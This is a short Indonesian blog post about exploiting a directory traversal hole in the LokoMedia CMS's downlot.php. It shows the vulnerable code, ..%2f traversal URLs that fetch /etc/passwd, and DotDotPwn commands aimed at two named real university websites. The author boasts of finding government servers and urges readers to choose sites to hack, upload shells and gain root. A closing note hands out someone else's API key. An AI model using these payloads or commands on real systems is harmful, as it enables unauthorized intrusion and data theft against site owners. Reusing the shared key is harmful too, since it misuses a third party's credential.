# ray16

wasted blog

# ray16 RSS Feed
 

Archive for web

[BT5-R1] Another Story of Directory Traversal ..

sudah semenjak terakhir Unicode / UTF-8 encoded directory traversal ditemukan pada tahun 2000, hemm 12 tahun lalu..

kemarin gw sempet melakukan pentest di salah satu perusahaan XXXXXXXXX, ada 1 hal yang pengen gw share disini, yaitu YAAA! masih ada nya bug di Directory Traversal! damn dude, elo sebagai web master emang harus banget merhatiin codingan elo itu ada bug ini apa enggak.

so setelah itu, gw konek internet, lalu gw melakukan SURFING! untuk cari website yang masih ada bug ini, sampailah gw di salah satu website yang memakai LokoMedia, gw suruh isal untuk analisa bug Directory Traversal di CMS ini, isal lalu menganalisa setiap script pada LokoMedia, terkhusus di hole pada file downlot.php

yang isi script nya ada lah berikut :


$direktori = \"files/\"; // folder tempat penyimpanan file yang boleh didownload
$filename = $_GET['file'];

$file_extension = strtolower(substr(strrchr($filename,\".\"),1));

#snip

tidak ada sanitize, serta metode pemanggilan nama file yang sangat rentan terhadap DT, script ini dikategorikan vurnable.

namun programmer lokomedia nampaknya sudah tau akan bug ini, tapi di biarkan, karena hasil investigasi bug ini tidak dapat menampilkan file ber ekstensi php.

di script berikut dilarang :

if ($file_extension=='php'){
  echo "<h1>Access forbidden!</h1>
        <p>Maaf, file yang Anda download sudah tidak tersedia atau filenya (direktorinya) telah diproteksi. <br />
        Silahkan hubungi <a href='mailto:redaksi@bukulokomedia.com'>webmaster</a>.</p>";
  exit;
}

so mari kita ganti misi nya untuk mendapatkan konfigurasi web server saja.

Real Live Example

kita akan melakukan crawling website, dan gw temukan beberapa web (banyak sebenarnya) yang mempunyai vuln di Directory Traversal.

hasil Directory Traversal :

LOOK! kita nemu server pemerintah NON JAIL SHELL! it means? yep kalo kita bisa owning lalu upload shell, exploit local, viola we got root :p

another example

hasil Directory Traversal :

another server yang NON JAIL SHELL!, soo pilah pilih web yang mau di hack, dan kita bisa owning satu server *yakin banget looooo :D

lalu bagaimana dengan server windows? see this

hasil Directory Traversal :

The Fuzzer

well adapula dengan traditional way, dengan cara tradisional, menentukan file target yang akan diambil, ex : /etc/passwd, lalu menambahkan setiap titik dua kali lalu slash, tergantung linux yang memakai slash ke kanan, atau windows yang memakai slash ke kiri.

example :

url encode :
/ => %2f

target file = /etc/passwd

http://vuln.com?vulnScript.php?file=..%2fetc%2fpasswd
http://vuln.com?vulnScript.php?file=..%2f..%2fetc%2fpasswd
http://vuln.com?vulnScript.php?file=..%2f..%2f..%2fetc%2fpasswd

dst .. sampe dapet.

ada cara yang lebih mudah, lets tool do it! yeah sekarang 2012 dude! *nuff said.

namanya DotDotPwn, tool untuk sangat sangat memudahkan DT, di backtrack 4 dahulu tools ini tersedia, tapi dihilangkan di backtrack 5, entah apa karena target DT semakin sedikit?

feature yang diberikan dotdotpwn sangat lengkap untuk melakukan directory traversal, bahkan ada metode stdout, os guessing, dan test hingga puluhan ribu metode.

gw berikan contoh untuk teknik penyerangan DT pada metode GET di URL.

untuk web dengan OS Unix

# perl dotdotpwn.pl -o unix -d 10 -u "http://fst.unsoed.ac.id:80/downlot.php?file=TRAVERSAL&x=1" -m http-url -k "root:"

untuk web dengan OS windows

# perl dotdotpwn.pl -o windows -d 15 -u "http://www.perpus.wima.ac.id/web/downlot.php?file=TRAVERSAL" -m http-url -k "127"

Good Luck! ;p

tl.gd ubersocial api

makasih buat drubicza yang udah share api key nya

silahkan teman teman memakai ini

http://murrayramadhan.net/demo/tlgd/